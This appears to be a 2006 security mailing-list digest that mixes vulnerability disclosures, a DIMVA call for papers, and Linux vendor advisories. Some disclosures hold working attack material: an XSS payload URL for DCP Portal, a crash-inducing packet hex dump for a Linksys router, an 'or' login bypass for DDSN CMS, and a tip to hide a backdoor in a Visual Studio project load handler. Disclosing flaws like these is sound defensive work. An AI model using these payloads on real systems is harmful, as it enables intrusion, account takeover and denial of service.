MyBB 1.0.2 SQL injection
Hey this is a bug report for mybb software ( forum software downloadable from http://www.mybboard.com) bug found by imei; bug is in usercp.php file line 830 (ver 1.0.2 latest ver) that allows SQL injection bug is in result of poor checking for $mybb-input['threadmode'] value that can have quote and can change other fields' values and may result to full access to admin cp (by injecting usergroup field) bug is reported to vendor and perhaps they will patched it soon. bests imei
DCP Portal Cross-Site Scripting Vulnerability
##Night_WarriorKurdish Hacker ##night_warrior771[at]hotmail.com ##DCP Portal Cross-Site Scripting Vulnerability ##http://www.dcp-portal.org http://vicktimhost/calendar.php?show=full_months=1submit=GOday=[XSS] http://vicktimhost/search.php post this code scriptalert('night_warrior');/script
Linksys VPN Router (BEFVP41) DoS Vulnerability
Linksys BEFVP41 (possibly others) (not sure which firmware) can be instantenously crashed by sending a specially crafted IP packet with a null length for IP option #0xE4 , like this one: 00 0f 66 99 a3 45 00 10 5a cc 59 84 08 00 46 00 00 2c 04 d2 00 00 ff aa 06 2a c0 a8 01 65 43 08 c6 15 e4 00 00 00 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 52 53 54 55 I tried from within LAN-side of the router. Did not test WAN-side, but probably still works. Requires a reboot to fix. Found it accidentally while doing nessus scan. (Nessus Referenced BID : 7175, 14536)
DIMVA 2006 Call for Papers
Sorry, if you receive multiple copies of this Call for Papers. RECENT UPDATES!!! - - Due to multiple requests the paper submission deadline has been extended to Friday, January 27, 2006! - Selected papers will be published in revised and extended version in a special issue of Springer's Journal in Computer Virology! --- CALL FOR PAPERS DIMVA 2006 Third GI SIG SIDAR Conference on Detection of Intrusions Malware, and Vulnerability Assessment In Cooperation with IEEE Computer Society Task Force on Information Assurance Berlin, Germany July 13 - 14, 2006 http://www.dimva.org/dimva2006 mailto:[EMAIL PROTECTED] --- The special interest group Security - Intrusion Detection and Response (SIDAR) of the German Informatics Society (GI) organizes DIMVA as an annual conference that brings together experts from throughout and outside of Europe to discuss the state of the art in the areas of intrusion detection, malware detection, and vulnerability assessment. DIMVA invites three types of submissions: - Full papers of up to 20 pages, presenting novel and mature research results. Full papers will be reviewed, and papers accepted for presentation at the conference will be included in the proceedings. The proceedings will appear in Springer's Lecture Notes in Computer Science (LNCS) series. In addition, selected papers will be published in revised and extended version in a special issue of Springer's Journal in Computer Virology. - Industry papers of up to 10 pages, describing best practices, case studies, lessons learned, or latest product developments. Industry papers will be reviewed and, if accepted for presentation at the conference, published on the DIMVA 2006 Web site. - Proposals of two-to-three-hour tutorials on topics of current or emerging interest. Tutorial proposals must not exceed 3 pages. They must clearly identify the intended audience, include a brief biography of the speaker, and contain sufficient material to provide a sense of their scope and depth. Tutorial material will be published on the DIMVA 2006 Web site. The scope of DIMVA is broad and includes, but is not restricted to the following areas: Vulnerability Assessment: - Vulnerabilities and exploitation techniques - Vulnerability detection - Avoidance of vulnerabilities and software testing - Reverse engineering - ROI on vulnerability assessment and management Intrusion Detection: - Intrusion techniques - Intrusion detection and event correlation - Intrusion response and intrusion prevention - Benchmarking of intrusion detection and prevention systems - Incident management and response Malware: - Malware techniques - Malware detection - Malware prevention - Benchmarking of malware detection and prevention systems - Computer and network forensics DIMVA particularly encourages papers that discuss the technical as well as the organizational integration of vulnerability, intrusion and malware detection techniques and systems for large-scale communication and enterprise networks. Furthermore, papers from other communities such as law-making, law enforcement, economics and public administration that present these communities' perspectives on and contributions to the above IT security issues are welcomed. ORGANIZING COMMITTEE General Chair: Pavel Laskov, Fraunhofer FIRST, Germany, [EMAIL PROTECTED] Program Chair: Roland Bueschkes, T-Mobile, Germany, [EMAIL PROTECTED] Sponsor Chair: Marc Heuse, n.runs, Germany, [EMAIL PROTECTED] PROGRAM COMMITTEE - Phil Attfield, Northwest Security Institute, USA Thomas Biege, SUSE LINUX Products GmbH, Germany Marc Dacier, Institut Eurecom, France Herve Debar, France Telecom RD, France Sven Dietrich, Carnegie Mellon University, USA Toralv Dirro, McAfee, Germany Ulrich Flegel, University of Dortmund, Germany Dirk Haeger, BSI, Germany Bernhard Haemmerli, HTA Luzern, Switzerland Oliver Heinz, arago AG, Germany Peter Herrmann, NTNU Trondheim, Norway Marc Heuse, n.runs, Germany Erland Jonsson, Chalmers University of Technology, Sweden Klaus Julisch, IBM Research, USA Engin Kirda, Technical University Vienna, Austria Hartmut Koenig, BTU Cottbus, Germany Klaus-Peter Kossakowski, DFN-Cert, Germany Christopher Kruegel, Technical University Vienna, Austria Jens Meggers, Symantec, USA Michael Meier, BTU Cottbus, Germany Achim Mueller, Deutsche Telekom Laboratories, Germany Martin Naedele, ABB Corporate Research, Switzerland Dirk Schadt, Computer Associates, Germany Window Snyder, Chordata Security, USA Robin Sommer, ICIR/ICSI,
TSLSA-2006-0002 - multi
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Trustix Secure Linux Security Advisory #2006-0002 Package names: clamav, cups, fetchmail, mod_auth_pgsql, sudo Summary: Multiple vulnerabilities Date: 2006-01-13 Affected versions: Trustix Secure Linux 2.2 Trustix Secure Linux 3.0 Trustix Operating System - Enterprise Server 2 - -- Package description: clamav Clam AntiVirus is a GPL anti-virus toolkit for UNIX. The main purpose of this software is the integration with mail servers (attachment scanning). The package provides a flexible and scalable multi-threaded daemon, a command line scanner, and a tool for automatic updating via Internet. The programs are based on a shared library distributed with package, which you can use with your own software. cups The Common UNIX Printing System provides a portable printing layer for UNIX(R) operating systems. It has been developed by Easy Software Products to promote a standard printing solution for all UNIX vendors and users. CUPS provides the System V and Berkeley command-line interfaces. fetchmail Fetchmail is a remote mail retrieval and forwarding utility intended for use over on-demand TCP/IP links, like SLIP or PPP connections. Fetchmail supports every remote-mail protocol currently in use on the Internet (POP2, POP3, RPOP, APOP, KPOP, all IMAPs, ESMTP ETRN, IPv6, and IPSEC) for retrieval. Then Fetchmail forwards the mail through SMTP so you can read it through your favorite mail client. mod_auth_pgsql The mod_auth_pgsql module consists an authorization handler that uses an PostgreSQL server as the basis for authorizations. sudo Sudo (superuser do) allows a system administrator to give certain users (or groups of users) the ability to run some (or all) commands as root while logging all commands and arguments. Sudo operates on a per-command basis. It is not a replacement for the shell. Features include: the ability to restrict what commands a user may run on a per-host basis, copious logging of each command (providing a clear audit trail of who did what), a configurable timeout of the sudo command, and the ability to use the same configuration file (sudoers) on many different machines. Problem description: clamav TSL 3.0 TSL 2.2 - New Upstream. - SECURITY Fix: Fixes possible heap based buffer overflow in libclamav/upx.c. The Common Vulnerabilities and Exposures project has assigned the name CVE-2006-0162 to this issue. cups TSL 3.0 TSL 2.2 TSEL 2 - SECURITY Fix: Chris Evans has reported some vulnerabilities in xpdf, which can be exploited by malicious people to cause a DoS. - Integer overflow error exists in Stream.cc:StreamPredictor::StreamPredictor() and Stream.cc::CCITTFaxStream::CCITTFaxStream() when calculating buffer sizes for memory allocation. This can potentially be exploited to overflow the allocated heap memory. - An infinite loop error exists in Stream.cc::DCTStream::readMarker() when handling certain malformed input files. This can potentially be exploited to cause a DoS. - Missing validation of input parameters in Stream.cc:DCTStream::readHuffmanTables() and Stream.cc:DCTStream::readScanInfo() can cause out-of-bounds memory access. This can potentially be exploited to overwrite certain memory. - Some potential integer overflow error exists in JBIG2Stream.cc. The Common Vulnerabilities and Exposures project has assigned the name CVE-2005-3624, CVE-2005-3625, CVE-2005-3626 and CVE-2005-3627 to these issues. fetchmail TSL 3.0 TSL 2.2 - New Upstream. - SECURITY Fix: A vulnerability has been reported in Fetchmail caused due to a null pointer dereferencing error when handling a message without email headers. This can be exploited to crash Fetchmail when the upstream mail server sends a message without headers. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-4348 to this issue. mod_auth_pgsql TSL 3.0 - New Upstream. - SECURITY Fix: iDEFENSE has reported a format string flaw in mod_auth_pgsql. This could allow a remote unauthenticated attacker to execute arbitrary code as the httpd process. The Common Vulnerabilities and Exposures project has assigned the name CVE-2005-3656 to this issue. sudo TSL 3.0 TSL 2.2 TSEL 2 - SECURITY FIX: A vulnerability has been reported in Sudo caused due to an error within the environment cleaning. This can be exploited by a user with sudo access to a perl script to load and execute arbitrary library files via the PERLLIB, PERL5LIB and the PERL5OPT environment variables. The Common Vulnerabilities and Exposures project
TSL-2006-0001 - postgresql
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Trustix Secure Linux Bugfix Advisory #2006-0001 Package names: postgresql Summary: Various bug fixes Date: 2006-01-13 Affected versions: Trustix Secure Linux 3.0 Trustix Secure Linux 2.2 - -- Package description: postgresql PostgreSQL is an advanced Object-Relational database management system (DBMS) that supports almost all SQL constructs (including transactions, subselects and user-defined types and functions). The postgresql package includes the client programs and libraries that you'll need to access a PostgreSQL DBMS server. These PostgreSQL client programs are programs that directly manipulate the internal structure of PostgreSQL databases on a PostgreSQL server. These client programs can be located on the same machine with the PostgreSQL server, or may be on a remote machine which accesses a PostgreSQL server over a network connection. This package contains the docs in HTML for the whole package, as well as command-line utilities for managing PostgreSQL databases on a PostgreSQL server. Problem description: postgresql TSL 3.0 TSL 2.2 TSEL 2 - New Upstream Action: We recommend that all systems with this package installed be upgraded. Please note that if you do not need the functionality provided by this package, you may want to remove it from your system. Location: All Trustix Secure Linux updates are available from URI:http://http.trustix.org/pub/trustix/updates/ URI:ftp://ftp.trustix.org/pub/trustix/updates/ About Trustix Secure Linux: Trustix Secure Linux is a small Linux distribution for servers. With focus on security and stability, the system is painlessly kept safe and up to date from day one using swup, the automated software updater. Automatic updates: Users of the SWUP tool can enjoy having updates automatically installed using 'swup --upgrade'. Questions? Check out our mailing lists: URI:http://www.trustix.org/support/ Verification: This advisory along with all Trustix packages are signed with the TSL sign key. This key is available from: URI:http://www.trustix.org/TSL-SIGN-KEY The advisory itself is available from the errata pages at URI:http://www.trustix.org/errata/trustix-2.2/ and URI:http://www.trustix.org/errata/trustix-3.0/ or directly at URI:http://www.trustix.org/errata/2006/0001/ MD5sums of the packages: - -- 6a5d70d4a121138b85c294c24d2c0f0e 3.0/rpms/postgresql-8.0.6-1tr.i586.rpm c50fbf4aecf523f4ca5813f5694de516 3.0/rpms/postgresql-contrib-8.0.6-1tr.i586.rpm 5639c285914d1cde3d8fd43a14e52e9a 3.0/rpms/postgresql-devel-8.0.6-1tr.i586.rpm 9f9a981131b0c0f479f7e04f833a2300 3.0/rpms/postgresql-docs-8.0.6-1tr.i586.rpm 44c9ed304a895573983e59352862231d 3.0/rpms/postgresql-libs-8.0.6-1tr.i586.rpm fda16d06459777d9bafe4d9089d95ad1 3.0/rpms/postgresql-plperl-8.0.6-1tr.i586.rpm 916759e98e245197bc4cdb44fca45862 3.0/rpms/postgresql-python-8.0.6-1tr.i586.rpm 0a2fc6a01e1088b040be80bf60853c99 3.0/rpms/postgresql-server-8.0.6-1tr.i586.rpm fad753ad8b36fb1f1bfa0c67eae77055 3.0/rpms/postgresql-test-8.0.6-1tr.i586.rpm 02a04586aee59f256a803047183a5332 2.2/rpms/postgresql-8.0.6-1tr.i586.rpm b5a7432286a2a8c3acb483478cc12996 2.2/rpms/postgresql-contrib-8.0.6-1tr.i586.rpm da04cd71cfa4b33357dd5791401e00d2 2.2/rpms/postgresql-devel-8.0.6-1tr.i586.rpm 306652671a5b68caed046dd48042b7b7 2.2/rpms/postgresql-docs-8.0.6-1tr.i586.rpm e9d99fe3cc1cdf655fef0988e33ef69e 2.2/rpms/postgresql-libs-8.0.6-1tr.i586.rpm b1fe5832e29334a353c95b154585fddb 2.2/rpms/postgresql-plperl-8.0.6-1tr.i586.rpm dd6d4f5f4829ff907330d502573865bb 2.2/rpms/postgresql-python-8.0.6-1tr.i586.rpm 19c205915fc703de085d3f04dd7beff8 2.2/rpms/postgresql-server-8.0.6-1tr.i586.rpm ed0892e6384538f07f0e8b4b7b0906da 2.2/rpms/postgresql-test-8.0.6-1tr.i586.rpm - -- Trustix Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.1 (GNU/Linux) iD8DBQFDx6YRi8CEzsK9IksRAiw1AJ43MpgVMPFrvMqVOX1fwE1Y+MQ0sgCfXQ+V kxfUqegXuYAKAXHnIHzX2AQ= =gWRR -END PGP SIGNATURE-
DDSN CMS Admin Panel SQL Injection Vulnerability
Web Site : http://www.ddsn.com and http://www.cm3cms.com Description : DDSN is an expert provider of professional services surrounding the science of content management: Design, information architecture, deployment, and integration. In addition we offer our own content management software: Our flagship product is cm3 content manager. cm3 provides powerful off-the-shelf web-based content management tools driven by a deep and extensible application development platform at a killer price. cm3 is the perfect choice for both large and small organisations looking for a CMS that will grow with their business. SQL injection code : Username : 'or' Password : 'or' Contact : [EMAIL PROTECTED] and irc.gigachat.net Created by Botan
Visual Studio Remote Code Execution
Hi, I coded a remote code execution exploit for visual studio 2005 and below. If you open a solution and you click on the Form1.cs file the code inside the UserControl1_Load function is executed. You can code your backdoor inside this function. Basically the exploit only start a calc.exe application. Have a look at http://www.securiteam.com or http://www.priestmaster.org/exploits greets, priestmaster.
MDKSA-2006:013 - Updated kolab packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:013 http://www.mandriva.com/security/ ___ Package : kolab-resource-handlers Date: January 12, 2006 Affected: 2006.0 ___ Problem Description: A problem exists in how the Kolab Server transports emails bigger than 8KB in size and if a dot (.) character exists in the wrong place. If these conditions are met, kolabfilter will double this dot and a modified email will be delivered, which could lead to broken clear-text signatures or broken attachments. The updated packages have been patched to correct these problems. ___ References: http://kolab.org/security/kolab-vendor-notice-07.txt ___ Updated Packages: Mandriva Linux 2006.0: 0ac77fdb0776f06f40dd8ba0ed30d317 2006.0/RPMS/kolab-resource-handlers-0.4.1-0.20050811.2.1.20060mdk.noarch.rpm 45f74289423c41ad54d49f7e77899fa8 2006.0/SRPMS/kolab-resource-handlers-0.4.1-0.20050811.2.1.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 2d56dcded06922276579f29129533a1e x86_64/2006.0/RPMS/kolab-resource-handlers-0.4.1-0.20050811.2.1.20060mdk.noarch.rpm 45f74289423c41ad54d49f7e77899fa8 x86_64/2006.0/SRPMS/kolab-resource-handlers-0.4.1-0.20050811.2.1.20060mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFDxtxEmqjQ0CJFipgRAvydAJkBuhr7Il3CFvXNVgSvOFiUjuRmBwCgpLat n6BrU+moTSBANRjoKIn2+js= =FL1V -END PGP SIGNATURE-